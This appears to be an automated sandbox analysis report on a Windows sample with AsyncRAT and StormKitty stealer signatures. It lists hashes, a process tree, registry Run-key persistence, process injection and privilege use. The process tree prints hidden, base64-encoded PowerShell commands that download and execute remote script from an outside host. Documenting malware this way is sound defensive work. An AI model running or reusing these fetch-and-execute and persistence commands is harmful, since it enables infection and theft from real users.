Analysis
-
max time kernel
94s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 11:25
Static task
static1
Behavioral task
behavioral1
Sample
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe
Resource
win10v2004-20241007-en
General
-
Target
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe
-
Size
95.5MB
-
MD5
ce6f5ba448e5b85d0410c70eb68b8b7b
-
SHA1
d82919e11eeaa23997e5047d2041c5acb8c3bab5
-
SHA256
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
-
SHA512
1f9a82b77ae9e18d82b4c0751e114b27f1b009968644353ed2bfeb5315b8f8fcd4dee4c74b00d35bc1f76cd0bd0078014697797dfe4fd082dd54460aa7260dee
-
SSDEEP
1536:srae78zjORCDGwfdCSog01313zAYs5gczGNuKTFP76k:0ahKyd2n31UR5MTFPJ
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1976-66-0x0000000000400000-0x000000000064A000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 12 1616 powershell.exe 22 1192 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1192 powershell.exe 1616 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
Edgeservices.exeChromeservices.exepid process 1204 Edgeservices.exe 4236 Chromeservices.exe -
Loads dropped DLL 10 IoCs
Processes:
Edgeservices.exeChromeservices.exepid process 1204 Edgeservices.exe 1204 Edgeservices.exe 1204 Edgeservices.exe 1204 Edgeservices.exe 4236 Chromeservices.exe 4236 Chromeservices.exe 4236 Chromeservices.exe 4236 Chromeservices.exe 4236 Chromeservices.exe 4236 Chromeservices.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Edgeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Edgeservices\" \"C:\\Users\\Public\\Downloads\\Edgeservices\\Edgeservices.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Chromeservices\" \"C:\\Users\\Public\\Downloads\\Chromeservices\\Chromeservices.exe\"" powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Edgeservices.exeChromeservices.exedescription pid process target process PID 1204 set thread context of 1976 1204 Edgeservices.exe installutil.exe PID 4236 set thread context of 3240 4236 Chromeservices.exe AddInProcess32.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4336 1976 WerFault.exe installutil.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
AddInProcess32.exeinstallutil.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language installutil.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1616 powershell.exe 1616 powershell.exe 1192 powershell.exe 1192 powershell.exe 1192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exeinstallutil.exepowershell.exedescription pid process Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1976 installutil.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeIncreaseQuotaPrivilege 1976 installutil.exe Token: SeSecurityPrivilege 1976 installutil.exe Token: SeTakeOwnershipPrivilege 1976 installutil.exe Token: SeLoadDriverPrivilege 1976 installutil.exe Token: SeSystemProfilePrivilege 1976 installutil.exe Token: SeSystemtimePrivilege 1976 installutil.exe Token: SeProfSingleProcessPrivilege 1976 installutil.exe Token: SeIncBasePriorityPrivilege 1976 installutil.exe Token: SeCreatePagefilePrivilege 1976 installutil.exe Token: SeBackupPrivilege 1976 installutil.exe Token: SeRestorePrivilege 1976 installutil.exe Token: SeShutdownPrivilege 1976 installutil.exe Token: SeDebugPrivilege 1976 installutil.exe Token: SeSystemEnvironmentPrivilege 1976 installutil.exe Token: SeRemoteShutdownPrivilege 1976 installutil.exe Token: SeUndockPrivilege 1976 installutil.exe Token: SeManageVolumePrivilege 1976 installutil.exe Token: 33 1976 installutil.exe Token: 34 1976 installutil.exe Token: 35 1976 installutil.exe Token: 36 1976 installutil.exe Token: SeIncreaseQuotaPrivilege 1976 installutil.exe Token: SeSecurityPrivilege 1976 installutil.exe Token: SeTakeOwnershipPrivilege 1976 installutil.exe Token: SeLoadDriverPrivilege 1976 installutil.exe Token: SeSystemProfilePrivilege 1976 installutil.exe Token: SeSystemtimePrivilege 1976 installutil.exe Token: SeProfSingleProcessPrivilege 1976 installutil.exe Token: SeIncBasePriorityPrivilege 1976 installutil.exe Token: SeCreatePagefilePrivilege 1976 installutil.exe Token: SeBackupPrivilege 1976 installutil.exe Token: SeRestorePrivilege 1976 installutil.exe Token: SeShutdownPrivilege 1976 installutil.exe Token: SeDebugPrivilege 1976 installutil.exe Token: SeSystemEnvironmentPrivilege 1976 installutil.exe Token: SeRemoteShutdownPrivilege 1976 installutil.exe Token: SeUndockPrivilege 1976 installutil.exe Token: SeManageVolumePrivilege 1976 installutil.exe Token: 33 1976 installutil.exe Token: 34 1976 installutil.exe Token: 35 1976 installutil.exe Token: 36 1976 installutil.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).execmd.exepowershell.exeEdgeservices.execmd.exepowershell.exeChromeservices.exedescription pid process target process PID 4816 wrote to memory of 2464 4816 fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe cmd.exe PID 4816 wrote to memory of 2464 4816 fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe cmd.exe PID 2464 wrote to memory of 1616 2464 cmd.exe powershell.exe PID 2464 wrote to memory of 1616 2464 cmd.exe powershell.exe PID 1616 wrote to memory of 1204 1616 powershell.exe Edgeservices.exe PID 1616 wrote to memory of 1204 1616 powershell.exe Edgeservices.exe PID 1204 wrote to memory of 1956 1204 Edgeservices.exe AddInProcess32.exe PID 1204 wrote to memory of 1956 1204 Edgeservices.exe AddInProcess32.exe PID 1204 wrote to memory of 1956 1204 Edgeservices.exe AddInProcess32.exe PID 1204 wrote to memory of 1956 1204 Edgeservices.exe AddInProcess32.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 1204 wrote to memory of 1976 1204 Edgeservices.exe installutil.exe PID 4816 wrote to memory of 4084 4816 fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe cmd.exe PID 4816 wrote to memory of 4084 4816 fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe cmd.exe PID 4084 wrote to memory of 1192 4084 cmd.exe powershell.exe PID 4084 wrote to memory of 1192 4084 cmd.exe powershell.exe PID 1192 wrote to memory of 4236 1192 powershell.exe Chromeservices.exe PID 1192 wrote to memory of 4236 1192 powershell.exe Chromeservices.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe PID 4236 wrote to memory of 3240 4236 Chromeservices.exe AddInProcess32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe"C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\SYSTEM32\cmd.execmd /c sora.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:1956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 12966⤵
- Program crash
PID:4336
-
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sorast.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3240
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1976 -ip 19761⤵PID:4620
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556c43715e0e7fa58012d8a5769d8d568
SHA14370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA2568ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed
-
Filesize
1KB
MD54fe81288ed69f286820a38e284c3e424
SHA1f6ed802cf562c4646f629ae6946d6fc77f39d97e
SHA256b0794129d82ac2c3f372bf8582d9e55e9c63b3843d6d0e9bc111d482355bdcd3
SHA5128813941122dadd5b05243b94317f52285f4be468c633609fe5c2103c6ca57568631c908c11db234e45839023789403ca023b708f929eb96adca0cd7068c66afd
-
Filesize
6KB
MD5345718527c30710326719967e3fd4d50
SHA18f7be9c69a4e95155dd33c935f362155d91c05dc
SHA256ac4db954f2a68c4b12ba72dc4feb193c16b9bdc6a58d9550a9a5fb7383227bd5
SHA51221bf40922a5fb96239eff6107d394cac3862b2a9068b80949bfe158a420d1588685d005c0d70ed69b7614d393b3f846d1d61e13048e9650a5087367b6f7c54f6
-
Filesize
7KB
MD5d80437fda6ba90dd8338ca91fbcc18dc
SHA187415b5650b55ff7b2a38684768a49018e42d982
SHA25681d20d2731ab795995553d20cb60a7481ae4fa27615257418489f802683b435a
SHA5122ffc42e30f0a63d1b9a563ee9ec346faf26a71d4f9f3a429f35e4d95d446a2dbc6aa2bb43a37d0b8533feb02bd738e5708be49919ad27cc572175d547be07240
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.2MB
MD50897cd584a6a8e39b9f2e25a2ab193e2
SHA14af09f0291c659d74e4e7f1a7e96632b3987daef
SHA2568c7cda207cb9031fb126719a43bff6e2fb4b8e2ccffb3efa2b895f6092603b65
SHA512bfb5663756a8b18a0945e9e654256870f100de50e815dcddb86a2aed06bb85b2e5792e121b4af0560987adc40c5b9e020a5e32e1ddf4dafd29efc2aca9b9a427
-
Filesize
292KB
MD58b0e3a4d5c72ddee5866296bcb2c8185
SHA1d689fbf9c6fcf957243e0c3f89831cecf69eade3
SHA2562d585161ec71beeaf8234163341482a06d6ee01856e058518986a59fbddeb11b
SHA512ca33dccc148b9acdeb1f064d6313101c8bc5daaed04f417b42a30d2bf4788e7d23b8536c0431650fbe5fcf4b44aeab3db478452390f4cb78ea42d731e8a5e198
-
Filesize
45KB
MD525ab75a586f4b22ebae81e74b20bfee9
SHA197f52704adbbd42f1c6415f565241ba1521c450f
SHA25614a4044215f341ba1ece3e49d475e309749b65c8959f2724d26209ed705a225a
SHA512cfa18fcccdeb95450f9ddb24dd620edca3faec765d339395884bcd2369783e37fd41ab3923a2d7439512670eb9389555dfc5a72adb725c818d2a5f4ea5154f7c
-
Filesize
3.1MB
MD5d63a867c0a14584dfe04a9712c64bc0b
SHA13dc1c8e9ca93962a6d3400be3ac7d76d65f87a01
SHA25660dbf8cb76cbfc6a1b6df53ea3c087eecba1bf59737a1de2a2b96475f0c912c0
SHA512aeebf3c911816b0b984bf78a43275575e7e1ddb61473d0bd14504316cf389da0373e78948c0ba3d54146aed95f2569987549b76a1325e0c949e2d16e038c8914
-
Filesize
36KB
MD5d8d1a08176ba2542c58669c1c04da1b7
SHA1e0d0059baf23fb5e1d2dadedc12e2f53c930256d
SHA25626c29d01df73a8e35d32e430c892d925abb6e4ad62d3630ae42b69daacba1a0d
SHA5125308790fbcf6348e87e7d5b9235ed66942527326f7ba556c910d68d94617bdd247a4ed540b4b9f8d4e73d15cf4a7204c0a57d4fd348ec26e53f39b91be8617fb
-
Filesize
2.3MB
MD522c3fc378a3c3311bb5e9082c443fbd4
SHA106c32b31de4772da425c1eebc6c8064ed4305843
SHA256422172e732ebd0892d8e737c07c3a9fead044f6f0d587a2e5991c40783e03ca9
SHA5124330eb482c2257a1775e1edc10753dc302042266fc012a20007c1706e31c65a67017d7eb63a1eb5e13a84b7638ddf24017c63b71e92dfd30215cc7ab7f878a4b
-
Filesize
552KB
MD529c6c243cfb1cec96b4a1008274f9600
SHA1c54b10ef6305cc3814c68e6c8fd6daecbb27622a
SHA25644a5af24f8d5f9c50a9e5a200a0486100afb6a0e86377e2e3e622a7bbb57cb04
SHA51239c34554ea7b6d433c2aecfdeff87959e625e943bf7a446ebca8e5878eaf24198c1b188359a0343fb78478f2bc8b986ca4d0e69d39bac6ff80cb901fe4f113ee
-
Filesize
94KB
MD502794a29811ba0a78e9687a0010c37ce
SHA197b5701d18bd5e25537851614099e2ffce25d6d8
SHA2561729421a22585823493d5a125cd43a470889b952a2422f48a7bc8193f5c23b0f
SHA512caf2a478e9c78c8e93dd2288ed98a9261fcf2b7e807df84f2e4d76f8130c2e503eb2470c947a678ac63e59d7d54f74e80e743d635428aa874ec2d06df68d0272